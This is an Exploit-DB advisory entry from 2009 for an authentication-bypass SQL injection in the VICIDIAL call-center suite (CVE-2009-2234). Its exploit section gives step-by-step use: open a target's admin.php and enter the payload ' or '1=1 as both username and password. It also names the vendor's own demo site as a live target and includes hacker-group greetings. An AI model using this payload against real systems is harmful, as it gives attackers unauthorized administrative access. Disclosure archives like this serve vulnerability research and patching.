VICIDIAL 2.0.5-173 Auth Bypass SQL Injection Vulnerability

2009-05-21T00:00:00
ID EDB-ID:8755
Type exploitdb
Reporter Striker7
Modified 2009-05-21T00:00:00

Description

VICIDIAL 2.0.5-173 (Auth Bypass) SQL Injection Vulnerability. CVE-2009-2234. Webapps exploit for php platform

                                        
                                            #      _ _ _  _ _ _        _      _ _  _ _ _   _____
# _ _ |_   _| |  _ )  (_) | |__  |     |  _ )      /
#(_-<   | |   | |_//  | | | / /  |---> | |_//     /
#/__/   |_|   | |  \\ |_| |_\_\  |_ _  | |  \\   /
#########################################################################################################
[+] Type Exploit :VICIDIAL call center suite (Admin Bypass) SQL Injection Vulnerability
[+] Script Homepage :http://www.vicidial.org
[+] Discovered By Striker7
[+] Greate : His0k4 , Super Cristal , Yassine_enp , Dreadful ,Str0ke, And ALl Hacker Muslims(Dz)
[+] www.Snakespc.com
[+] Back To Hacker Of Nother Method
#########################################################################################################
 [+] Exploit(Ex):
  http://[Target].com/[path]/admin.php
   then >>
   Username:   ' or '1=1
   Password:   ' or '1=1
   [+]Live Demo:
   http://www.vicidial.org/vicidial/admin.php
#########################################################################################################

# milw0rm.com [2009-05-21]